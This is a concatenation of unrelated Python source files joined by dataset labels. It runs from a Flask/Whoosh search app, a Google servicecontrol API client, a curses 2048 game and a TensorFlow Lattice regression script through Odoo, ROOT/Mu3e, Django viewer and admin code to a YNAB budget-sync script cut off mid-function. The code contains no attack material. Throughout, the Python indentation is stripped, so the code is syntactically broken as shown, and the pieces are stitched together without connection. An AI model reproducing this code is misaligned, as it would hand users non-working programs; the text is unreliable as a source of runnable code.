# "pagerank": scores[url_dict[hit["url"]]]
# })
# else:
# if highlight_xy:
# res.append({"title": hit['title'],
# "xueyuan": Markup(hi.highlight_hit(hit, "xueyuan")),
# "url": hit["url"],
# 'shotpath': hit['shotpath'],
# "content": Markup(hi.highlight_hit(hit, "content")),
# "parenturl": hit["parenturl"],
# "picpath": "images/%s/%s" % (
# hit['picpath'].split('/')[-3], hit['picpath'].split('/')[-1]),
# "pagerank": scores[url_dict[hit["url"]]]
# })
# else:
# res.append({"title": hit['title'],
# "xueyuan": hit["xueyuan"],
# "url": hit["url"],
# 'shotpath': hit['shotpath'],
# "content": Markup(hi.highlight_hit(hit, "content")),
# "parenturl": hit["parenturl"],
# "picpath": "images/%s/%s" % (
# hit['picpath'].split('/')[-3], hit['picpath'].split('/')[-1]),
# "pagerank": scores[url_dict[hit["url"]]]
# })
# print(len(result))
# print(res)
# count = len(result)
#
# if count == 0:
# logging.warning("%d,没有查询到相关内容!" % 404)
# return "没有查询到相关内容!", 404
# else:
# # 记录查询日志
# log = "Response: "
# for item in res:
# log = log + " (name:%s,url:%s) " % (item["title"], item["url"])
# logging.info(log)
#
# # # 基于page rank 对链接进行排序
# # res.sort(key=lambda k:(k.get("pagerank",0)),reverse = True)
# # print(res)
#
# mysession["data"] = res # 使用会话session传递参数
# return jsonify({"url": "/display/%d&%s" % (count, query_sentence)})
# 基本查询函数,实现前缀、通配、正则匹配,短语、关系运算查询功能
# 基于whoosh的highlighter实现返回高亮查询词块
@app.route('/index',methods=['GET','POST'])
def base_query():
assert request.path == '/index'
#print(dict(request.form)["query"][0])
#print(dict(request.form))
query_sentence = str(dict(request.form)["query"][0])
logging.info("Query sentence: %s"%query_sentence)
res = []
with ix.searcher() as searcher:
# 对输入的查询文本进行解析,如果存在按域查询的需求则区分按域查询,默认采用多属性查询模式
# mark 表示是否需要高亮学院查询区域,默认情况下需要
highlight_xy = True
# 默认的多域查询
query = qparser.MultifieldParser(["content","title","mtext","xueyuan"], ix.schema)
if query_sentence.endswith("$姓名$"):
# 按名字查询
query =qparser.SimpleParser("title",ix.schema)
query_sentence=query_sentence.strip('$姓名$')
elif query_sentence.endswith("$学院$"):
# 按学院查询
query = qparser.SimpleParser("xueyuan", ix.schema)
query_sentence=query_sentence.strip('$学院$')
elif query_sentence.endswith("$网页$"):
# 按网页内容查询
query = qparser.SimpleParser("content", ix.schema)
query_sentence=query_sentence.strip('$网页$')
#print(query_sentence)
# 引入查询解析器插件
query.add_plugin(qparser.WildcardPlugin)
# query.remove_plugin_class(qparser.WildcardPlugin)
query.add_plugin(qparser.PrefixPlugin())
query.add_plugin(qparser.OperatorsPlugin)
query.add_plugin(qparser.RegexPlugin)
query.add_plugin(qparser.PhrasePlugin)
# 解析得到查询器
q = query.parse(query_sentence)
logging.info("Query parse result: %s"%str(q))
print(q)
# 获取查询结果
result = searcher.search(q,limit=20)
# print(result)
# 设置碎片的属性
# Allow larger fragments
my_cf = highlight.ContextFragmenter(maxchars=200, surround=30)
hf = highlight.HtmlFormatter( tagname='em', classname='match', termclass='term')
hi = highlight.Highlighter(fragmenter=my_cf,formatter=hf)
for hit in result:
print(hit["picpath"])
print(hit["title"])
print(escape(hi.highlight_hit(hit,"content")))
if hit['picpath'] =='#':
if highlight_xy:
res.append({"title": hit['title'],
"xueyuan": Markup(hi.highlight_hit(hit, "xueyuan")),
"url": hit["url"],
'shotpath': hit['shotpath'],
"content": Markup(hi.highlight_hit(hit, "content")),
"parenturl": hit["parenturl"],
"picpath": '#',
"pagerank":scores[url_dict[hit["url"]]]
})
else:
res.append({"title": hit['title'],
"xueyuan": hit["xueyuan"],
"url": hit["url"],
'shotpath': hit['shotpath'],
"content": Markup(hi.highlight_hit(hit, "content")),
"parenturl": hit["parenturl"],
"picpath": '#',
"pagerank":scores[url_dict[hit["url"]]]
})
else:
if highlight_xy:
res.append({"title":hit['title'],
"xueyuan":Markup(hi.highlight_hit(hit, "xueyuan")),
"url":hit["url"],
'shotpath':hit['shotpath'],
"content":Markup(hi.highlight_hit(hit,"content")),
"parenturl": hit["parenturl"],
"picpath":"images/%s/%s"%(hit['picpath'].split('/')[-3],hit['picpath'].split('/')[-1]),
"pagerank": scores[url_dict[hit["url"]]]
})
else:
res.append({"title": hit['title'],
"xueyuan": hit["xueyuan"],
"url": hit["url"],
'shotpath': hit['shotpath'],
"content": Markup(hi.highlight_hit(hit, "content")),
"parenturl": hit["parenturl"],
"picpath": "images/%s/%s" % (
hit['picpath'].split('/')[-3], hit['picpath'].split('/')[-1]),
"pagerank": scores[url_dict[hit["url"]]]
})
print(len(result))
print(res)
count = len(result)
if count ==0:
logging.warning("%d,没有查询到相关内容!"%404)
return "没有查询到相关内容!",404
else:
# 记录查询日志
log = "Response: "
for item in res:
log = log + " (name:%s,url:%s) " % (item["title"], item["url"])
logging.info(log)
# # 基于page rank 对链接进行排序
# res.sort(key=lambda k:(k.get("pagerank",0)),reverse = True)
# print(res)
mysession["data"] = res # 使用会话session传递参数
return jsonify({"url":"/display/%d&%s"%(count,query_sentence)})
if __name__ == '__main__':
app.run(debug=False,use_reloader=False)
|
nilq/baby-python
|
python
|
# Copyright 2016 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Generated client library for servicecontrol version v1."""
# NOTE: This file is originally auto-generated using google-apitools then
# style-correcting hand edits were applied. New behaviour should not provided
# by hand, please re-generate and restyle.
from __future__ import absolute_import
from apitools.base.py import base_api
from . import servicecontrol_v1_messages as messages
class ServicecontrolV1(base_api.BaseApiClient):
"""Generated client library for service servicecontrol version v1."""
MESSAGES_MODULE = messages
_PACKAGE = u'servicecontrol'
_SCOPES = [u'https://www.googleapis.com/auth/cloud-platform',
u'https://www.googleapis.com/auth/servicecontrol']
_VERSION = u'v1'
_CLIENT_CLASS_NAME = u'ServicecontrolV1'
_URL_VERSION = u'v1'
_API_KEY = None
# pylint: disable=too-many-arguments
def __init__(self, url='', credentials=None,
get_credentials=True, http=None, model=None,
log_request=False, log_response=False,
credentials_args=None, default_global_params=None,
additional_http_headers=None):
"""Create a new servicecontrol handle."""
url = url or u'https://servicecontrol.googleapis.com/'
super(ServicecontrolV1, self).__init__(
url, credentials=credentials,
get_credentials=get_credentials, http=http, model=model,
log_request=log_request, log_response=log_response,
credentials_args=credentials_args,
default_global_params=default_global_params,
additional_http_headers=additional_http_headers)
self.services = self.ServicesService(self)
class ServicesService(base_api.BaseApiService):
"""Service class for the services resource."""
_NAME = u'services'
def __init__(self, client):
super(ServicecontrolV1.ServicesService, self).__init__(client)
self._method_configs = {
'check': base_api.ApiMethodInfo(
http_method=u'POST',
method_id=u'servicecontrol.services.check',
ordered_params=[u'serviceName'],
path_params=[u'serviceName'],
query_params=[],
relative_path=u'v1/services/{serviceName}:check',
request_field=u'checkRequest',
request_type_name=u'ServicecontrolServicesCheckRequest',
response_type_name=u'CheckResponse',
supports_download=False,
),
'report': base_api.ApiMethodInfo(
http_method=u'POST',
method_id=u'servicecontrol.services.report',
ordered_params=[u'serviceName'],
path_params=[u'serviceName'],
query_params=[],
relative_path=u'v1/services/{serviceName}:report',
request_field=u'reportRequest',
request_type_name=u'ServicecontrolServicesReportRequest',
response_type_name=u'ReportResponse',
supports_download=False,
),
}
self._upload_configs = {
}
def check(self, request, global_params=None):
"""Checks quota, abuse status etc. to decide whether the given
operation. should proceed. It should be called by the service
before the given operation is executed.
This method requires the `servicemanagement.services.check`
permission on the specified service. For more information, see
[Google Cloud IAM](https://cloud.google.com/iam).
Args:
request: (ServicecontrolServicesCheckRequest) input message
global_params: (StandardQueryParameters, default: None)
global arguments
Returns:
(CheckResponse) The response message.
"""
config = self.GetMethodConfig('check')
return self._RunMethod(
config, request, global_params=global_params)
def report(self, request, global_params=None):
"""Reports an operation to the service control features such as
billing, logging, monitoring etc. It should be called by the
service after the given operation is completed.
This method requires the `servicemanagement.services.report`
permission on the specified service. For more information, see
[Google Cloud IAM](https://cloud.google.com/iam).
Args:
request: (ServicecontrolServicesReportRequest) input message
global_params: (StandardQueryParameters, default: None) global
arguments
Returns:
(ReportResponse) The response message.
"""
config = self.GetMethodConfig('report')
return self._RunMethod(
config, request, global_params=global_params)
|
nilq/baby-python
|
python
|
#!/usr/bin/env python3
import curses
from random import randrange, choice # generate and place new tile
from collections import defaultdict
letter_codes = [ord(ch) for ch in 'WASDRQwasdrq']
actions = ['Up', 'Left', 'Down', 'Right', 'Restart', 'Exit']
actions_dict = dict(zip(letter_codes, actions * 2))
def get_user_action(keyboard):
char = "N"
while char not in actions_dict:
char = keyboard.getch()
return actions_dict[char]
def transpose(field):
return [list(row) for row in zip(*field)]
def invert(field):
return [row[::-1] for row in field]
class GameField(object):
def __init__(self, height=4, width=4, win=2048):
self.height = height
self.width = width
self.win_value = 2048
self.score = 0
self.highscore = 0
self.reset()
def reset(self):
if self.score > self.highscore:
self.highscore = self.score
self.score = 0
self.field = [[0 for i in range(self.width)] for j in range(self.height)]
self.spawn()
self.spawn()
def move(self, direction):
def move_row_left(row):
def tighten(row): # squeese non-zero elements together
new_row = [i for i in row if i != 0]
new_row += [0 for i in range(len(row) - len(new_row))]
return new_row
def merge(row):
pair = False
new_row = []
for i in range(len(row)):
if pair:
new_row.append(2 * row[i])
self.score += 2 * row[i]
pair = False
else:
if i + 1 < len(row) and row[i] == row[i + 1]:
pair = True
new_row.append(0)
else:
new_row.append(row[i])
assert len(new_row) == len(row)
return new_row
return tighten(merge(tighten(row)))
moves = {}
moves['Left'] = lambda field: \
[move_row_left(row) for row in field]
moves['Right'] = lambda field: \
invert(moves['Left'](invert(field)))
moves['Up'] = lambda field: \
transpose(moves['Left'](transpose(field)))
moves['Down'] = lambda field: \
transpose(moves['Right'](transpose(field)))
if direction in moves:
if self.move_is_possible(direction):
self.field = moves[direction](self.field)
self.spawn()
return True
else:
return False
def is_win(self):
return any(any(i >= self.win_value for i in row) for row in self.field)
def is_gameover(self):
return not any(self.move_is_possible(move) for move in actions)
def draw(self, screen):
help_string1 = '(W)Up (S)Down (A)Left (D)Right'
help_string2 = ' (R)Restart (Q)Exit'
gameover_string = ' GAME OVER'
win_string = ' YOU WIN!'
def cast(string):
screen.addstr(string + '\n')
def draw_hor_separator():
top = '┌' + ('┬──────' * self.width + '┐')[1:]
mid = '├' + ('┼──────' * self.width + '┤')[1:]
bot = '└' + ('┴──────' * self.width + '┘')[1:]
separator = defaultdict(lambda: mid)
separator[0], separator[self.height] = top, bot
if not hasattr(draw_hor_separator, "counter"):
draw_hor_separator.counter = 0
cast(separator[draw_hor_separator.counter])
draw_hor_separator.counter += 1
def draw_row(row):
cast(''.join('│{: ^5} '.format(num) if num > 0 else '| ' for num in row) + '│')
screen.clear()
cast('SCORE: ' + str(self.score))
if 0 != self.highscore:
cast('HGHSCORE: ' + str(self.highscore))
for row in self.field:
draw_hor_separator()
draw_row(row)
draw_hor_separator()
if self.is_win():
cast(win_string)
else:
if self.is_gameover():
cast(gameover_string)
else:
cast(help_string1)
cast(help_string2)
def spawn(self):
new_element = 4 if randrange(100) > 89 else 2
(i, j) = choice([(i, j) for i in range(self.width) for j in range(self.height) if self.field[i][j] == 0])
self.field[i][j] = new_element
def move_is_possible(self, direction):
def row_is_left_movable(row):
def change(i): # true if there'll be change in i-th tile
if row[i] == 0 and row[i + 1] != 0: # Move
return True
if row[i] != 0 and row[i + 1] == row[i]: # Merge
return True
return False
return any(change(i) for i in range(len(row) - 1))
check = {}
check['Left'] = lambda field: \
any(row_is_left_movable(row) for row in field)
check['Right'] = lambda field: \
check['Left'](invert(field))
check['Up'] = lambda field: \
check['Left'](transpose(field))
check['Down'] = lambda field: \
check['Right'](transpose(field))
if direction in check:
return check[direction](self.field)
else:
return False
def main(stdscr):
curses.use_default_colors()
game_field = GameField(win=32)
state_actions = {} # Init, Game, Win, Gameover, Exit
def init():
game_field.reset()
return 'Game'
state_actions['Init'] = init
def not_game(state):
game_field.draw(stdscr)
action = get_user_action(stdscr)
responses = defaultdict(lambda: state)
responses['Restart'], responses['Exit'] = 'Init', 'Exit'
return responses[action]
state_actions['Win'] = lambda: not_game('Win')
state_actions['Gameover'] = lambda: not_game('Gameover')
def game():
game_field.draw(stdscr)
action = get_user_action(stdscr)
if action == 'Restart':
return 'Init'
if action == 'Exit':
return 'Exit'
if game_field.move(action): # move successful
if game_field.is_win():
return 'Win'
if game_field.is_gameover():
return 'Gameover'
return 'Game'
state_actions['Game'] = game
state = 'Init'
while state != 'Exit':
state = state_actions[state]()
curses.wrapper(main)
|
nilq/baby-python
|
python
|
# https://qiita.com/taigamikami/items/6c69fc813940f838e96c
import numpy as np
import tensorflow as tf
import tensorflow_lattice as tfl
import matplotlib.pyplot as plt
import input_data
# ====================================
# 訓練用のデータ
# ====================================
#x_train = np.arange(-5, 5, 0.2)
#noise = np.random.normal(0, 4, x_train.shape)
#y_train = np.square(x_train) + noise
data = input_data.read_data("train")
x_train = data.T[0]
y_train = data.T[1]
batch_size = len(x_train)
# input_fn = tf.estimator.inputs.numpy_input_fn(
# {"x": x_train}, y_train, batch_size=batch_size, num_epochs=None, shuffle=True)
train_input_fn = tf.estimator.inputs.numpy_input_fn(
{"x": x_train}, y_train, batch_size=batch_size, num_epochs=1000, shuffle=False)
# ====================================
# 訓練(トレーニング)
# ====================================
# 機能のリストを宣言する。 1つの数値機能しかありません。 より複雑で有用な他の多くのタイプの列があります。
feature_columns = [
tf.feature_column.numeric_column("x")
]
# Hyperparameters.
num_keypoints = 10
# hparams = tfl.CalibratedRtlHParams(
# num_keypoints=num_keypoints,
# num_lattices=5,
# lattice_rank=2,
# learning_rate=0.01)
hparams = tfl.CalibratedLinearHParams(
num_keypoints=num_keypoints,
num_lattices=10,
# lattice_rank=2,
learning_rate=0.1)
# Set feature monotonicity.
#hparams.set_feature_param('x', 'monotonicity', -1)
# Define keypoint init.
keypoints_init_fns = {
'x': lambda: tfl.uniform_keypoints_for_signal(num_keypoints,
input_min=-5.0,
input_max=5.0,
output_min=0.0,
output_max=25.0),
}
print("keypoints_init_fns: %r" % keypoints_init_fns)
# ====================================
# 訓練
# ====================================
# lattice_estimator = tfl.calibrated_lattice_regressor(
# feature_columns=feature_columns,
# hparams=hparams,
# keypoints_initializers_fn=keypoints_init_fns
# )
lattice_estimator = tfl.calibrated_linear_regressor(
feature_columns=feature_columns,
hparams=hparams,
keypoints_initializers_fn=keypoints_init_fns
)
# Train!
train_input_fn = tf.estimator.inputs.numpy_input_fn(
x={"x": x_train},
y=y_train,
batch_size=batch_size,
num_epochs=1000,
shuffle=False)
train_metrics = lattice_estimator.train(input_fn=train_input_fn)
# ====================================
# モデルの評価
# ====================================
eval_metrics = lattice_estimator.evaluate(input_fn=train_input_fn)
print("train metrics: %r"% eval_metrics)
# ====================================
# 検証用データ
# ====================================
eval_data = input_data.read_data("eval")
x_eval = eval_data.T[0]
y_eval = eval_data.T[1]
#
eval_input_fn = tf.estimator.inputs.numpy_input_fn(
{"x": x_eval}, y_eval, batch_size=4, num_epochs=1000, shuffle=False)
eval_metrics = lattice_estimator.evaluate(input_fn=eval_input_fn)
print("eval metrics: %r"% eval_metrics)
# ====================================
# 予測
# ====================================
predict_data = input_data.read_data("predict")
x_predict = predict_data.T[0]
predict_input_fn = tf.estimator.inputs.numpy_input_fn(
x={"x": x_predict},
y=None,
batch_size=batch_size,
num_epochs=1,
shuffle=False
)
predict_results = list(lattice_estimator.predict(input_fn=predict_input_fn))
# ====================================
# データを図表に表示する
# ====================================
fig = plt.figure()
ax1 = fig.add_subplot(1, 1, 1)
ax1.scatter(x_train, y_train)
y_predict = np.array([])
for prediction in predict_results:
y_predict = np.append(y_predict, prediction["predictions"][0])
ax1.plot(x_eval, y_predict, "r-")
plt.show()
|
nilq/baby-python
|
python
|
config = {
"--acoustic-scale":[0.1,float],
"--allow-partial":["false",str],
"--beam":[13,int],
"--beam-delta":[0.5,float],
"--delta":[0.000976562,float],
"--determinize-lattice":["true",str],
"--hash-ratio":[2,int],
"--lattice-beam":[8,int],
"--max-active":[7000,int],
"--max-mem":[50000000,int],
"--min-active":[200,int],
"--minimize":["false",str],
"--phone-determinize":["true",str],
"--prune-interval":[25,int],
"--word-determinize":["true",str],
"--word-symbol-table":["",str]
}
|
nilq/baby-python
|
python
|
"""
Odoo client using Openerp proxy
"""
# https://pypi.org/project/openerp_proxy/
from openerp_proxy import Client as erpClient
class Client():
"""
Odoo client
"""
def __init__(self, username:str, password:str = '', database:str = '', host:str = '', port:int = 443, protocol:str = 'json-rpcs'):
"""
Initialize parameters here
"""
if len(username) == 0:
raise ValueError('Missing username argument')
self.username = username
self.password = password
self.database = database
self.host = host
self.port = port
self.protocol = protocol
self.client = None # Set this in connect or enter
self.user = None
def connect(self):
"""
Connect to Odoo
"""
self.client = erpClient(
host=self.host,
dbname=self.database,
user=self.username,
pwd=self.password,
protocol=self.protocol,
port=self.port)
# Check connection by fetching user name
self.user = self.client.user
def __enter__(self):
self.connect()
return self
def __exit__(self, type, value, traceback):
pass
def search(self, db_name, filters):
"""
Search ids for db_name using filters
"""
return self.client[db_name].search(filters)
def search_read(self, db_name, filters):
"""
Search data for db_name using filters
"""
return self.client[db_name].search_read(filters)
def read(self, db_name, ids, fields=None):
"""
Read data using ids list or int. Fields is optional
"""
return self.client[db_name].read(ids, fields)
def write(self, db_name, ids, field):
"""
Write data to db_name with id
"""
return self.client[db_name].write(ids, field)
def create(self, db_name, fields):
return self.client[db_name].create(fields)
def start_tracking(self, args):
return self.client['project.task'].start_tracking(args)
def terminate_tracking(self, args):
return self.client['project.task'].terminate_tracking(args)
|
nilq/baby-python
|
python
|
import ROOT
import numpy as np
# fast index lookup
from melp.libs.misc import index_finder
def save_histo(filename: str, dt_dict: dict):
histo_file = ROOT.TFile.Open(filename, "RECREATE")
for keys in dt_dict.keys():
name_z = str(keys) + "z"
name_phi = str(keys) + "phi"
histo_file.WriteObject(dt_dict[keys][0], name_z)
histo_file.WriteObject(dt_dict[keys][1], name_phi)
def read_histo(filename: str) -> dict:
global histo_file
histo_file = ROOT.TFile.Open(filename, "READ")
dt_dict = {}
for key in histo_file.GetListOfKeys():
h = key.ReadObj()
name = h.GetName()
dict_key = name.replace("_z", "")
dict_key = int(dict_key.replace("_phi", ""))
if dict_key not in dt_dict.keys():
dt_dict[dict_key] = [None, None]
if "z" in name:
dt_dict[dict_key][0] = h
# print(h)
elif "phi" in name:
dt_dict[dict_key][1] = h
return dt_dict
# ---------------------------------------
#
# Generates dictionary with ROOT TH1D Histogramms
# -> dict[tileid] = [hist_z, hist_pih]
#
def fill_dt_histos(detector, ttree_mu3e, histo_options: tuple) -> dict:
cluster_counter = 0
hist_dict = {}
nbins, lo, hi = histo_options
# Generating empty histos:
for tile in detector.TileDetector.tile:
histo_name_z = str(tile) + "_z"
histo_name_phi = str(tile) + "_phi"
hist_dict[tile] = [ROOT.TH1D(histo_name_z, histo_name_z, nbins, lo, hi),
ROOT.TH1D(histo_name_phi, histo_name_phi, nbins, lo, hi)]
# tilehits = ROOT.vector('int')()
# tilehitstime = ROOT.vector('double')()
# ttree_mu3e.SetBranchStatus("tilehit_tile", 1)
# ttree_mu3e.SetBranchStatus("tilehit_time", 1)
# ttree_mu3e.SetBranchAddress("tilehit_tile", tilehits)
# ttree_mu3e.SetBranchAddress("tilehit_time", tilehitstime)
for frame in range(ttree_mu3e.GetEntries()):
ttree_mu3e.GetEntry(frame)
# Printing status info
if frame % 10000 == 0:
print("Searching clusters. Progress: ", np.round(frame / ttree_mu3e.GetEntries() * 100), " % , Found: ",
cluster_counter, end='\r')
# TODO: index_finder cant handle multiple events on one tile in one frame!!!
# --> skipping frame (looses some data)
# Analyzing frame
for hit_tile_index in range(len(ttree_mu3e.tilehit_tile)):
hit_tile = ttree_mu3e.tilehit_tile[hit_tile_index]
# -----------------------------
# Look for clusters in z-dir
neighbour_z_id = detector.TileDetector.getNeighbour(hit_tile, "right")
if neighbour_z_id in ttree_mu3e.tilehit_tile and neighbour_z_id is not False:
# find associated tile hit
hit_tile_assoc = index_finder(list(ttree_mu3e.tilehit_tile), neighbour_z_id)
# workaround for multiple hits in the same tile
try:
hit_tile_assoc = int(*hit_tile_assoc)
except (TypeError, ValueError):
continue
# calculate dt
# TODO: TOF maybe with edep ?
hit_time_1 = ttree_mu3e.tilehit_time[hit_tile_index] # + detector.TileDetector.tile[hit_tile].dt_truth
hit_time_2 = ttree_mu3e.tilehit_time[hit_tile_assoc] # + detector.TileDetector.tile[
# neighbour_z_id].dt_truth
dt = hit_time_2 - hit_time_1
# Fill histogram
hist_dict[hit_tile][0].Fill(dt)
cluster_counter += 1
# -----------------------------
# Look for clusters in phi-dir
neighbour_phi_id = detector.TileDetector.getNeighbour(hit_tile, "up")
if neighbour_phi_id in ttree_mu3e.tilehit_tile and neighbour_phi_id is not False:
hit_tile = ttree_mu3e.tilehit_tile[hit_tile_index]
# find associated tile hit
hit_tile_assoc = index_finder(list(ttree_mu3e.tilehit_tile), neighbour_phi_id)
# workaround for multiple hits in the same tile
try:
hit_tile_assoc = int(*hit_tile_assoc)
except (TypeError, ValueError):
continue
# calculate dt
# TODO: TOF maybe with edep ?
hit_time_1 = ttree_mu3e.tilehit_time[hit_tile_index] # + detector.TileDetector.tile[hit_tile].dt_truth
hit_time_2 = ttree_mu3e.tilehit_time[hit_tile_assoc] # + detector.TileDetector.tile[
# neighbour_phi_id].dt_truth
dt = hit_time_2 - hit_time_1
# Fill histogram
hist_dict[hit_tile][1].Fill(dt)
cluster_counter += 1
print("Searching clusters. Progress: ", 100, " % , Found: ", cluster_counter)
return hist_dict
|
nilq/baby-python
|
python
|
import logging
from collections import namedtuple
import magic
from io import BytesIO
from django.views.generic import DetailView
from django.http import HttpResponse, HttpResponseRedirect
from django.urls import reverse
import matplotlib
import matplotlib.pyplot
import aplpy
import astropy
from scheduler.models import Workflow
matplotlib.use('agg')
astropy.log.setLevel('ERROR')
logger = logging.getLogger(__name__)
filemagic = magic.Magic() # flags=magic.MAGIC_MIME_TYPE)
class FitsView(DetailView):
"""
Returns an rendered image. uses path keyword argument. Only
allowes files which are in te settings.RESULTS_DIR folder somewhere.
"""
model = Workflow
def render_to_response(self, context, **kwargs):
size = int(self.request.GET.get('size', 5))
vmin = float(self.request.GET.get('vmin', 0))
vmax = float(self.request.GET.get('vmax', 0.1))
colorbar = (self.request.GET.get('colorbar', 'True').lower() != 'false')
fullpath = self.object.get_result(self.kwargs['path'])
figure = matplotlib.pyplot.figure(figsize=(size, size))
if colorbar:
subplot = [0.0, 0.0, 0.9, 1]
else:
subplot = [0.0, 0.0, 1, 1]
try:
fig = aplpy.FITSFigure(str(fullpath),
figure=figure,
subplot=subplot,
figsize=(size, size))
except IOError as e:
matplotlib.pyplot.text(0.1, 0.8, str(e))
else:
fig.show_colorscale(vmin=vmin, vmax=vmax)
if colorbar:
fig.add_colorbar()
fig.colorbar.set_font(size='xx-small')
fig.axis_labels.hide()
fig.tick_labels.hide()
fig.ticks.hide()
buf = BytesIO()
figure.canvas.print_figure(buf, format='png')
return HttpResponse(buf.getvalue(), content_type='image/png')
DirItem = namedtuple('DirItem', ['fullpath', 'name', 'type', 'size',
'modified', 'is_image'])
class SomethingView(DetailView):
"""
Will redirect to correct view according to file type.
Will render error page if file type is not understood.
"""
model = Workflow
template_name = 'viewer/unknowntype.html'
def get_context_data(self, **kwargs):
context = super(SomethingView, self).get_context_data(**kwargs)
fullpath = self.object.get_result(self.kwargs['path'])
context['type'] = filemagic.id_filename(str(fullpath))
context['path'] = self.kwargs['path']
return context
def render_to_response(self, context, **response_kwargs):
type_ = context['type']
if type_.startswith("FITS image data"):
return HttpResponseRedirect(reverse('scheduler:viewer_fits',
kwargs={'pk': self.object.id,
'path': self.kwargs['path']}))
if type_.startswith("ASCII text") or \
type_.startswith('UTF-8 Unicode text'):
return HttpResponseRedirect(reverse('scheduler:viewer_text',
kwargs={'pk': self.object.id,
'path': self.kwargs['path']}))
if type_.startswith('PNG image data') or \
type_.startswith('JPEG image data') or \
type_.startswith('HTML document'):
return HttpResponseRedirect(f"{self.object.public_serve()}/outdir/{self.kwargs['path']}")
return super(SomethingView, self).render_to_response(context)
class TextView(DetailView):
model = Workflow
template_name = 'viewer/textfile.html'
def get_context_data(self, **kwargs):
context = super(TextView, self).get_context_data(**kwargs)
path = self.kwargs['path']
fullpath = f"{self.object.outdir()}/{path}"
with open(fullpath, 'r') as f:
context['path'] = path
context['content'] = ''.join(f.readlines())
return context
class Js9View(DetailView):
"""
Will redirect to correct view according to file type.
Will render error page if file type is not understood.
"""
model = Workflow
template_name = 'viewer/js9.html'
def render_to_response(self, context, **response_kwargs):
response = super().render_to_response(context, **response_kwargs)
response["Access-Control-Allow-Origin"] = "js9.si.edu"
response["Access-Control-Allow-Methods"] = "GET, OPTIONS"
response["Access-Control-Max-Age"] = "1000"
response["Access-Control-Allow-Headers"] = "X-Requested-With, Content-Type"
return response
def get_context_data(self, **kwargs):
context = super().get_context_data(**kwargs)
context['path'] = f"{self.object.public_serve()}/outdir/{self.kwargs['path']}"
return context
|
nilq/baby-python
|
python
|
from django.contrib import admin
from django.contrib.auth import get_user_model
from django.contrib.auth.admin import UserAdmin
from .models import Favorite, Subscription
User = get_user_model()
class FavoriteAdmin(admin.ModelAdmin):
model = Favorite
list_display = ('user', 'recipe')
class SubscriptionAdmin(admin.ModelAdmin):
model = Subscription
list_display = ('user', 'author')
class UserAdmin(UserAdmin):
model = User
list_display = ('email', 'username', 'is_staff', 'is_active',)
list_filter = ('email', 'username', 'is_staff', 'is_active',)
fieldsets = (
(None, {'fields': ('username', 'email', 'password')}),
('Description', {'fields': ('first_name', 'last_name')}),
('Permissions', {'fields': ('is_staff', 'is_active')}),
)
add_fieldsets = (
(None, {
'classes': ('wide',),
'fields': (
'email', 'password1', 'password2', 'is_staff', 'is_active'
)
}),
)
search_fields = ('email', 'username')
ordering = ('email',)
admin.site.unregister(User)
admin.site.register(Favorite, FavoriteAdmin)
admin.site.register(Subscription, SubscriptionAdmin)
admin.site.register(User, UserAdmin)
|
nilq/baby-python
|
python
|
# -*- coding: utf-8 -*-
"""
Created on Sat Sep 7 18:40:45 2019
@author: ryder
"""
#%%
import os
import pandas as pd
from pynabapi import YnabClient
import pygsheets
import datetime
import time
import re
#%%
# should create google_ledger object
with open('keys/google_expenses_sheet_key.txt', 'r') as g_sheet_id_key_txt:
GOOGLE_SHEET_ID_KEY = g_sheet_id_key_txt.readline().strip()
gc = pygsheets.authorize(service_account_file='keys/service_account_credentials.json')
sh = gc.open_by_key(GOOGLE_SHEET_ID_KEY)
#%% GOOGLE FUNCTIONS
def load_and_process_sheet(sh=sh, tab=0):
w = sh.worksheet('index', tab)
ret_df = w.get_as_df(has_header=True, start='A2')
# dollars = ret_df.Amount.astype(str).str.extract(r'(\d+)')
# ret_df.loc[:, 'Amount'] = ret_df.Amount.astype(str).str.extract(r'(\d+)')
ret_df.Amount = ret_df.Amount.astype(str).str.extract(r'(\d+)')
# ret_df.loc[:, 'Timestamp'] = pd.to_datetime(ret_df.Timestamp)
ret_df.Timestamp = pd.to_datetime(ret_df.Timestamp)
return(ret_df.reset_index(drop=True))
# return(dollars)
def load_and_process_all_sheets(sh=sh):
colnames = ['Timestamp', 'Payee', 'Amount', 'Purpose', 'Description']
all_sheets = pd.DataFrame(columns = colnames)
for sheetnum in range(len(sh.worksheets())):
curr_sheet = load_and_process_sheet(sh, sheetnum)
sheet_title = re.search(r'(?<=Worksheet ).+(?= index)',
str(sh.worksheets()[1])).group(0)
if curr_sheet.shape[1] != 5:
raise Exception(f'Worksheet {sheet_title} (index {sheetnum} has the '
f'wrong dimensions.')
# print(curr_sheet.columns)
all_sheets = all_sheets.append(curr_sheet)
return(all_sheets.sort_values('Timestamp', ascending=False))
#%%
def get_last_trns_date(sh=sh, payee_name = 'Ryder', format = 'datetime'):
# Get all transactions in Google Sheets
__all_trans = load_and_process_all_sheets()
__max_date = (
__all_trans
.loc[__all_trans.Payee == payee_name]['Timestamp']
.max()
)
if format == 'datetime':
return(__max_date)
elif format == 'string':
return(__max_date.strftime('%Y-%m-%d'))
#%%
def get_trans_from_ynab(sh=sh, since_date=get_last_trns_date()):
# since_date = get_last_trns_date()
with open('keys/ynab_api_key.txt', 'r') as y_api_key_txt:
YNAB_CLIENT_KEY = y_api_key_txt.readline().strip()
with open('keys/ynab_budget_id.txt', 'r') as y_bud_id_txt:
YNAB_BUDGET_ID = y_bud_id_txt.readline().strip()
yc = YnabClient(YNAB_CLIENT_KEY)
all_transactions = yc.get_transaction(budget_id=YNAB_BUDGET_ID)
column_names = ['timestamp', 'payee', 'memo', 'flag', 'amount']
listofitems = []
for item in all_transactions:
listofitems.append(str(item.date) + ',,,' +
str(item.payee_name) + ',,,' +
str(item.memo) + ',,,' +
str(item.flag_color) + ',,,' +
str(item.amount)
)
ynab_df = pd.Series(listofitems).str.split(',,,', expand=True)
ynab_df.columns = column_names
ynab_df.timestamp = pd.to_datetime(ynab_df.timestamp)
ynab_df.amount = ynab_df.amount.astype(int) / -1000
ynab_df_filter = (
ynab_df[(ynab_df.timestamp >= since_date) &
(ynab_df.flag.isin(['red', 'purple']))]
)
ret_df = pd.DataFrame(columns = ['Timestamp', 'Payee',
'Amount', 'Purpose',
'Description'])
